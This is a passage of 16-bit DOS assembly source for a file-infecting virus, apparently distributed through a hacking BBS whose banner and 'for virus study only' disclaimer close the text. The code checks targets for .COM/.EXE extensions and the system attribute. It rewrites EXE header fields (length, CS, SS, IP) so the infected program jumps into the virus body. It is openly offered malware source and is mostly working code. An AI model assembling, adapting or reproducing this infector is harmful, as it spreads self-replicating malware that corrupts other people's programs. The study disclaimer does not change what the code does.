Not_Infect: stc
ret
Calc_exe: push ax
push dx
add ax,100h ; 100 bytes stack
adc dx,0 ; Overflow - inc dx
mov cx,dx
mov dx,ax
call Cng_file_ptr ; Go to EOF
push bx
add ax,[VirSize] ; New exe-length
adc dx,0
mov bx,200h ; For header: / 512
div bx
or dx,dx
jz No_Correct
inc ax ; Files below 2.000.000h bytes - length correction
No_Correct: mov [Head_buf+2],dx ; Save new file-length
mov [Head_buf+4],ax ; ' ' ' ' ' ' ' '
pop bx
pop dx
pop ax
call Calc_cs_ss
mov word ptr [Head_buf+10h],100h ; Prog-SP=100h
mov word ptr [Head_buf+14h],offset VirBegin ; Set prog-IP
clc
ret
;*** Proc: Calculate new CS and SS for .EXE file ***
Calc_cs_ss: push cx
mov cx,4
Cs_ss_lp: shr dx,1
rcr ax,1
loop Cs_ss_lp
sub ax,[Head_buf+8] ; Size of header
sbb dx,0
mov [Head_buf+0Eh],ax ; Save prog-SS
mov [Head_buf+16h],ax ; Save prog-cs
pop cx
ret
;*** Check infection is possible ***
Chk_Inf: call Chk_exec ; Check file is executable
jb Not_exec
call Get_attr ; Check file has no SYS attr
Not_Exec: ret
;*** Search-paths ***
Com_path db '.COM',0
Exe_path db '.EXE',0
;*** Check file is executable (.COM / .EXE)
Chk_Exec: push es
mov es,R_ds
mov di,dx
xor al,al
mov cx,80h
cld
repnz ; Search '.'
scasb
jnz not_inf ; No '.' found
dec di
push di
mov si,offset Com_path+4
mov cx,4
std
repz ; Check '.COM'
cmpsb
pop di
jnz no_com ; No .COM
clc
jmp short Infect
nop
Not_Inf: stc
Infect: cld
pop es
ret
No_Com: mov si,offset Exe_path+4
mov cx,4
repz ; Check '.EXE'
cmpsb
jnz not_inf ; No .EXE either - not executable
clc
jmp short infect
Get_Attr: push ds
mov ax,4300h ; Get FileAttr
xor cx,cx
mov ds,R_ds
int 21h
pop ds
jb Bad_Attr ; Error - don't infect
test cx,4 ; System-Attr?
jnz Bad_Attr ; Yes, don't infect
clc
ret
Bad_Attr: stc
ret
First_bytes: int 20h ; First bytes of orig. program - here just 'Go to DOS'
dw (?)
mov bx,cs ; Overwrites the begin
add bx,[102h]
push bx
mov bx,offset VirBegin
push bx
retf
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
--------------------
Bonjour a tous , G'Day All / Désolé pour certain tutorial qui sont en anglais / Et bon Hack! / |
|
